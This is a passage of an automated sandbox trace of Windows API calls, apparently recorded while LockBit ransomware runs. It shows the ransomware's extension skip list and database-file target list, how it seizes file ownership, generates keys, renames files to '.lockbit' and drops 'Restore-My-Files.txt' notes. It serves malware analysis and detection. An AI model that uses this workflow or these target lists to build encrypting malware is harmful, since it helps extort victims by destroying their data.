(lpString1=".ini", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Notes_loop.wmv") returned 1 [0082.630] lstrcmpiW (lpString1="ntldr", lpString2="Notes_loop.wmv") returned 1 [0082.630] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Notes_loop.wmv") returned 1 [0082.630] lstrcmpiW (lpString1="bootsect.bak", lpString2="Notes_loop.wmv") returned -1 [0082.630] lstrcmpiW (lpString1="autorun.inf", lpString2="Notes_loop.wmv") returned -1 [0082.630] lstrcmpiW (lpString1="thumbs.db", lpString2="Notes_loop.wmv") returned 1 [0082.630] lstrcmpiW (lpString1="iconcache.db", lpString2="Notes_loop.wmv") returned -1 [0082.630] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.630] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv") returned=".wmv" [0082.630] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0082.630] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0082.630] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0082.631] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0082.631] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv.lockbit") returned 79 [0082.632] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.633] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.633] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.634] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.634] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.634] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.634] RtlFreeAnsiString (AnsiString="\\") [0082.634] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.634] malloc (_Size=0x200) returned 0x77d800 [0082.634] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.634] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.634] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.635] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.635] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.635] CloseHandle (hObject=0x3c4) returned 1 [0082.636] free (_Block=0x77d800) [0082.636] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.636] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.636] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.636] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=693292) returned 1 [0082.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.636] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.637] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.637] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.637] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.643] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.643] malloc (_Size=0xb4) returned 0x77d800 [0082.643] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0082.651] free (_Block=0x77d800) [0082.651] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.651] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.651] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.652] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7021cdb8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7021cdb8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dc728c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbebec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_loop_PAL.wmv", cAlternateFileName="")) returned 1 [0082.652] lstrcmpiW (lpString1=".", lpString2="Notes_loop_PAL.wmv") returned -1 [0082.652] lstrcmpiW (lpString1="..", lpString2="Notes_loop_PAL.wmv") returned -1 [0082.652] PathFindExtensionW (pszPath="Notes_loop_PAL.wmv") returned=".wmv" [0082.652] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0082.652] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0082.653] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0082.653] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Notes_loop_PAL.wmv") returned 1 [0082.654] lstrcmpiW (lpString1="ntldr", lpString2="Notes_loop_PAL.wmv") returned 1 [0082.654] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Notes_loop_PAL.wmv") returned 1 [0082.654] lstrcmpiW (lpString1="bootsect.bak", lpString2="Notes_loop_PAL.wmv") returned -1 [0082.654] lstrcmpiW (lpString1="autorun.inf", lpString2="Notes_loop_PAL.wmv") returned -1 [0082.654] lstrcmpiW (lpString1="thumbs.db", lpString2="Notes_loop_PAL.wmv") returned 1 [0082.654] lstrcmpiW (lpString1="iconcache.db", lpString2="Notes_loop_PAL.wmv") returned -1 [0082.654] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.654] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv") returned=".wmv" [0082.654] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0082.654] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0082.654] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0082.655] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0082.655] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv.lockbit") returned 83 [0082.656] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.656] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.657] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.657] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.657] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.657] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.657] RtlFreeAnsiString (AnsiString="\\") [0082.657] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.657] malloc (_Size=0x200) returned 0x77d800 [0082.657] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.657] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.657] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.657] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.658] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.659] CloseHandle (hObject=0x3c4) returned 1 [0082.659] free (_Block=0x77d800) [0082.659] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.659] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.659] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.659] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=781292) returned 1 [0082.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.660] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.660] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.661] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.661] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.667] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.667] malloc (_Size=0xbc) returned 0x77d800 [0082.667] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0082.674] free (_Block=0x77d800) [0082.674] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.674] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.674] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.674] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7015e6e7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7015e6e7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="ParentMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0082.674] lstrcmpiW (lpString1=".", lpString2="ParentMenuButtonIcon.png") returned -1 [0082.674] lstrcmpiW (lpString1="..", lpString2="ParentMenuButtonIcon.png") returned -1 [0082.674] PathFindExtensionW (pszPath="ParentMenuButtonIcon.png") returned=".png" [0082.674] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.674] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.674] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.674] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.674] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.674] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.674] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.674] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.674] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.675] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.675] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.675] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.675] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.675] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.675] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.675] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.675] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.676] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.676] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.676] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.676] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ParentMenuButtonIcon.png") returned 1 [0082.676] lstrcmpiW (lpString1="ntldr", lpString2="ParentMenuButtonIcon.png") returned -1 [0082.676] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ParentMenuButtonIcon.png") returned -1 [0082.676] lstrcmpiW (lpString1="bootsect.bak", lpString2="ParentMenuButtonIcon.png") returned -1 [0082.676] lstrcmpiW (lpString1="autorun.inf", lpString2="ParentMenuButtonIcon.png") returned -1 [0082.676] lstrcmpiW (lpString1="thumbs.db", lpString2="ParentMenuButtonIcon.png") returned 1 [0082.676] lstrcmpiW (lpString1="iconcache.db", lpString2="ParentMenuButtonIcon.png") returned -1 [0082.676] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.676] PathFindExtensionW 